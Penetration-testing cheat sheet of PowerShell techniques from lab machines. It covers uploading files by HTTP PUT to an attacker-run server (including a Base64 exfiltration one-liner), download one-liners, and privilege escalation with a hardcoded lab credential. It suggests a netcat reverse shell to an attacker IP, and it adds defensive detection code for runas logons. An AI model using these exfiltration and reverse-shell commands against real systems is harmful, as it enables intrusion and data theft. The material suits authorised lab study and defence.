Upload file via PowerShell
>wget https://raw.githubusercontent.com/w0lfram1te/extended-http-server/main/ehttpserver.py
>python3 ehttpserver.py
Python's built-in http.server doesn't support PUT requests, so this extended server (which accepts PUT) is used instead.
>powershell -c "invoke-webrequest -method PUT -usebasicparsing -uri http://[IP]:[Port]/[FILE] -body (get-content [FILE_Upload])"
StatusCode : 201
StatusDescription : Created
Content : {} ...
Use Invoke-WebRequest with -Method PUT to upload the file to the Python server. Get-Content returns the file as an array of text lines, so this form is only suitable for text files; for binary content use the Base64 variant below.
>powershell -c "$Base64String = [System.convert]::ToBase64String((Get-Content -Path 'acls.csv' -Encoding Byte)); invoke-webrequest -method PUT -usebasicparsing -uri http://10.10.16.6:8000/base64.txt -body $Base64String"
One-liner version that Base64-encodes the file contents, which also works for binary files.
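The same PUT upload wrapped in a function, as an added example that is not part of the original notes: it reads the file as raw bytes (which works in both Windows PowerShell 5.1 and PowerShell 7, unlike Get-Content -Encoding Byte), Base64-encodes it, checks the response code, and reports the file's SHA-256 so the receiving side can verify the decoded copy. It assumes a PUT-capable listener such as ehttpserver.py; the host, port and file paths are placeholders.

```powershell
# Added example (not from the original notes): upload a file as Base64 text with a
# single PUT and report the SHA-256 of the original for verification after decoding.
# Assumes a PUT-capable listener such as ehttpserver.py; Uri and Path are placeholders.
function Send-FileAsBase64 {
    param(
        [Parameter(Mandatory)][string]$Path,   # local file to upload
        [Parameter(Mandatory)][string]$Uri     # e.g. http://[IP]:[Port]/base64.txt
    )

    # ReadAllBytes works in Windows PowerShell 5.1 and PowerShell 7 alike;
    # Get-Content -Encoding Byte only exists in 5.1 (PowerShell 6+ uses -AsByteStream).
    $bytes  = [System.IO.File]::ReadAllBytes((Resolve-Path $Path).Path)
    $sha256 = (Get-FileHash -Path $Path -Algorithm SHA256).Hash
    $b64    = [System.Convert]::ToBase64String($bytes)

    try {
        $resp = Invoke-WebRequest -Method PUT -UseBasicParsing -Uri $Uri -Body $b64
    } catch {
        # Invoke-WebRequest throws on 4xx/5xx; surface a short message instead of a stack trace
        throw "PUT $Uri failed: $($_.Exception.Message)"
    }

    [pscustomobject]@{
        StatusCode = $resp.StatusCode   # ehttpserver.py answers 201 Created on success
        Bytes      = $bytes.Length
        SHA256     = $sha256
    }
}

# Usage (placeholder values):
# Send-FileAsBase64 -Path 'acls.csv' -Uri 'http://[IP]:[Port]/base64.txt'
#
# Decoding on the receiving side, if that side is also PowerShell:
# [IO.File]::WriteAllBytes('acls.csv', [Convert]::FromBase64String((Get-Content base64.txt -Raw)))
# (Get-FileHash acls.csv -Algorithm SHA256).Hash   # compare with the SHA256 reported above
```

[Convert]::FromBase64String ignores whitespace, so a trailing newline in the saved base64.txt does not break the decode; the hash comparison is what confirms the transfer was complete.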
PowerShell download from URL
>Invoke-WebRequest "[URL]" -OutFile "[path]\[filename]"
>wget "[URL]" -OutFile "[path]\[filename]"
>(New-Object System.Net.WebClient).DownloadFile("[URL]","[path]\[filename]")
>curl.exe -Lo "[path]\[filename]" "[URL]"
Download the resource from the URL. In Windows PowerShell, wget is an alias of Invoke-WebRequest (and so is curl), whereas curl.exe is the real curl binary with its own command-line syntax; the two are not interchangeable.
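A download helper that verifies the file before it is used, as an added example that is not part of the original notes: it fetches the URL with Invoke-WebRequest -OutFile, compares the SHA-256 against an expected digest with Get-FileHash, and deletes the file on mismatch. The URL, output path and expected hash are placeholders; the digest is assumed to come from the publisher of the file.

```powershell
# Added example (not from the original notes): download a file and verify its
# SHA-256 before trusting it. The file is removed if the digest does not match.
# Url, OutFile and ExpectedSha256 are placeholders supplied by the caller.
function Get-VerifiedFile {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$OutFile,
        [Parameter(Mandatory)][string]$ExpectedSha256   # hex digest published by the source
    )

    # Invoke-WebRequest is what the wget/curl aliases resolve to in Windows PowerShell 5.1;
    # PowerShell 6+ dropped those aliases, so the cmdlet name is used directly here.
    Invoke-WebRequest -Uri $Url -OutFile $OutFile -UseBasicParsing

    $actual = (Get-FileHash -Path $OutFile -Algorithm SHA256).Hash
    # -ne on strings is case-insensitive in PowerShell, so upper/lower-case hex both match
    if ($actual -ne $ExpectedSha256) {
        Remove-Item -Path $OutFile -Force
        throw "Hash mismatch for $($OutFile): expected $ExpectedSha256, got $actual"
    }
    Get-Item -Path $OutFile
}

# Usage (placeholder values):
# Get-VerifiedFile -Url 'https://[URL]' -OutFile 'C:\[path]\[filename]' -ExpectedSha256 '[SHA256_HEX]'
```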
PowerShell Runas for PrivEsc
>$user = "Sniper\Chris"
>$pass = "12345qwert"
>$secstr = New-Object -TypeName System.Security.SecureString
>$pass.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
>$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $user, $secstr
>Invoke-Command -ScriptBlock { whoami } -Credential $cred -Computer localhost
sniper\chris
PrivEsc from the normal user to a privileged user (chris). Replace the "whoami" script block with other commands; for example, get a shell by replacing 'whoami' with '\\[IP]\share\nc64.exe -e cmd [Attacker's IP] [Port]'.
>runas /netonly /user:[domain]\[User] powershell.exe
>net view \\[domain IP]\
Run PowerShell as the other user with /netonly, so the credentials are used when authenticating to the remote domain controller. Use net view to check whether the runas user can list the shares.
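Two caveats for this section, with a detection-side example that is not part of the original notes. First, runas /netonly only applies the supplied credentials to outbound network authentication: whoami in the new window still shows the original local user, which is why the check above uses net view against the domain rather than whoami (the Invoke-Command variant earlier, by contrast, really runs as the target user but needs WinRM enabled on localhost). Second, on the machine where /netonly is used, Windows records a Security event 4624 with LogonType 9 (NewCredentials). The function below lists those events from the last N hours; reading the Security log requires Administrators or Event Log Readers membership, and the 24-hour default is an assumption.

```powershell
# Added example (not from the original notes): list recent NewCredentials logons,
# i.e. Security event 4624 with LogonType 9, which runas /netonly produces on the
# host where it is run. Needs rights to read the Security log. Lookback is an assumption.
function Get-NetOnlyLogons {
    param([int]$Hours = 24)

    # Get-WinEvent errors out when nothing matches; treat that as an empty result
    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Security'
        Id        = 4624
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        # Parse the event XML by field name instead of relying on Properties[] positions
        $xml  = [xml]$e.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        if ($data['LogonType'] -eq '9') {
            [pscustomobject]@{
                Time        = $e.TimeCreated
                SubjectUser = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
                # Type 9 clones the caller's token, so New Logon normally matches Subject;
                # the alternate credentials are only used for outbound authentication
                NewLogon    = "$($data['TargetDomainName'])\$($data['TargetUserName'])"
                Process     = $data['ProcessName']
                LogonId     = $data['TargetLogonId']
            }
        }
    }
}

# Usage:
# Get-NetOnlyLogons -Hours 6 | Format-Table -AutoSize
```

Type 9 logons are uncommon on most workstations, so a burst of them, or any from an unexpected process, is a cheap signal to review; the LogonId can be correlated with later network logons on the remote hosts the session authenticated to.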